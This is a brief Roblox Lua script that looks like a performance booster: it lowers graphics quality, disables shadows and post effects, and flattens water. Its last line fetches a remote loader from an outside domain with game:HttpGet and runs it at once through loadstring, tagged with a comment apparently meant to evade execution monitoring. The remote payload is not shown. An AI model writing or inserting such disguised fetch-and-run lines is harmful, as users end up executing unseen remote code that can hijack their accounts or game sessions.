local l = game:GetService("Lighting") local t = workspace.Terrain settings().Rendering.QualityLevel = Enum.QualityLevel.Level01 l.GlobalShadows = false l.FogEnd = 100000 for _, e in pairs(l:GetChildren()) do if e:IsA("PostEffect") then e.Enabled = false end end t.WaterWaveSize = 0 t.WaterWaveSpeed = 0 t.WaterReflectance = 0 t.WaterTransparency = 0 loadstring(game:HttpGet("https://api.riftdev.one/files/v4/loaders/75ab60d7e24095e031142bd39df615b3.lua"))() -- execution monitor ignore